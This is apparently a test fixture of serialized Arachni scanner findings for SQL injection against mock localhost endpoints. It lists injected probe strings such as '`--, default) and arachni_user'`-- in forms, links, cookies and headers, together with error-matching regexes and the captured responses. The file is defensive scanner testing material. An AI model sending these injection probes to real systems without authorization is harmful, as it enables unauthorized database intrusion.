dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1NyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/sqlite/form/append
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default'`--
:follow_location: true
:injected: default'`--
:combo:
!binary "aW5wdXQ=": default'`--
:action: http://localhost:7362/sqlite/form/append
:verification:
:id: Warning stuff sqlite_
var: input
url: http://localhost:7362/sqlite/form/append
injected: default'`--
id: Warning stuff sqlite_
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_
elem: form
remarks: {}
method: GET
response: ! 'Warning stuff sqlite_
SQLite/JDBCDriver
SQLite.Exception
System.Data.SQLite.SQLiteException
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1NyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/sqlite/link/flip?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: link
:params:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:follow_location: true
:injected: ''
:combo:
!binary "aW5wdXQ=": !binary |-
ZGVmYXVsdA==
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/sqlite/link/flip?input=default
:verification:
:id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
var: Parameter flip
url: http://localhost:7362/sqlite/link/flip?input=default
injected: ''
id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]
elem: link
remarks: {}
method: GET
response: ! '["Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: input
url: http://localhost:7362/sqlite/link/append?input=default
elem: link
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:param_flip: true
:injected_orig: )
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default)
:follow_location: true
:injected: default)
:combo:
!binary "aW5wdXQ=": default)
:action: http://localhost:7362/sqlite/link/append?input=default
:verification:
:id: Warning stuff sqlite_
var: input
url: http://localhost:7362/sqlite/link/append?input=default
injected: default)
id: Warning stuff sqlite_
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_
elem: link
remarks: {}
method: GET
response: ! 'Warning stuff sqlite_
SQLite/JDBCDriver
SQLite.Exception
System.Data.SQLite.SQLiteException
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNDo1OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: cookie2
url: http://localhost:7362/sqlite/cookie/append
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: )
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value)
:injected: cookie value)
:combo:
!binary "Y29va2llMg==": cookie value)
:action: http://localhost:7362/sqlite/cookie/append
:verification:
:id: Warning stuff sqlite_
var: cookie2
url: http://localhost:7362/sqlite/cookie/append
injected: cookie value)
id: Warning stuff sqlite_
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_
elem: cookie
remarks: {}
method: GET
response: ! 'Warning stuff sqlite_
SQLite/JDBCDriver
SQLite.Exception
System.Data.SQLite.SQLiteException
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value)
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTowMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/sqlite/cookie/flip
elem: cookie
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: cookie
:params: {}
:follow_location: true
:cookies:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/sqlite/cookie/flip
:verification:
:id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
var: Parameter flip
url: http://localhost:7362/sqlite/cookie/flip
injected: ''
id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]
elem: cookie
remarks: {}
method: GET
response: ! '[nil, "Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n"]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;'`--=95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTA1
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNTowMSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/sqlite/header/flip
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: Parameter flip
:element: header
:params:
:follow_location: true
:headers:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:injected: ''
:combo:
! '''`--': !binary |-
OTVmOWY4ZjA4ZjZmMzc5MjQyZDdhZGE4NmNhZTE5Njg1Y2EzOGU1ZjNlNDIy
OGQ3YmNkMjQ1NzU4ZDViOWM1OQ==
:action: http://localhost:7362/sqlite/header/flip
:verification:
:id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
var: Parameter flip
url: http://localhost:7362/sqlite/header/flip
injected: ''
id: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]
elem: header
remarks: {}
method: GET
response: ! '[nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil,
nil, nil, nil, "Warning stuff sqlite_\nSQLite/JDBCDriver\nSQLite.Exception\nSystem.Data.SQLite.SQLiteException\n",
nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil, nil]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
! '''`--': 95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MjUw
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: User-Agent
url: http://localhost:7362/sqlite/header/append
elem: header
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:Warning.*sqlite_.*)
:match: Warning stuff sqlite_
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
:injected_orig: ! '''`--'
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user'`--
:injected: arachni_user'`--
:combo:
User-Agent: arachni_user'`--
:action: http://localhost:7362/sqlite/header/append
:verification:
:id: Warning stuff sqlite_
var: User-Agent
url: http://localhost:7362/sqlite/header/append
injected: arachni_user'`--
id: Warning stuff sqlite_
regexp: (?i-mx:Warning.*sqlite_.*)
regexp_match: Warning stuff sqlite_
elem: header
remarks: {}
method: GET
response: ! 'Warning stuff sqlite_
SQLite/JDBCDriver
SQLite.Exception
System.Data.SQLite.SQLiteException
'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user'`--
Cookie: cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OTI=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxNToxNSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations: []
internal_modname: SQLInjection
internal_modname: SQLInjection
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
var: Parameter flip
url: http://localhost:7362/db2/form/flip
elem: form
method: GET
name: SQL Injection
description: SQL code can be injected into the web application.
tags:
- sql
- injection
- regexp
- database
- error
cwe: '89'
cwe_url: http://cwe.mitre.org/data/definitions/89.html
severity: High
cvssv2: '9.0'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
included in database queries."
remedy_code: ''
metasploitable: unix/webapp/arachni_sqlmap
mod_name: SQL Injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
UnixWiz: http://unixwiz.net/techtips/sql-injection.html
Wikipedia: http://en.wikipedia.org/wiki/SQL_injection
SecuriTeam: http://www.securiteam.com/securityreviews/5DP0N1P76E.html
OWASP: http://www.owasp.org/index.php/SQL_Injection
opts:
:redundant: false
:async: true
:regexp: (?i-mx:DB2 SQL error:)
:match: ! 'DB2 SQL error:'
:substring:
:ignore:
- !binary |-
U3RyaW5nIG9yIGJpbmFyeSBkYXRhIHdvdWxkIGJlIHRydW5jYXRlZA==
- !binary |-
QWNjZXNzIGRlbmllZCBmb3IgdXNlcg==
:elements:
- link
- form
- cookie
- header
- body
:train:
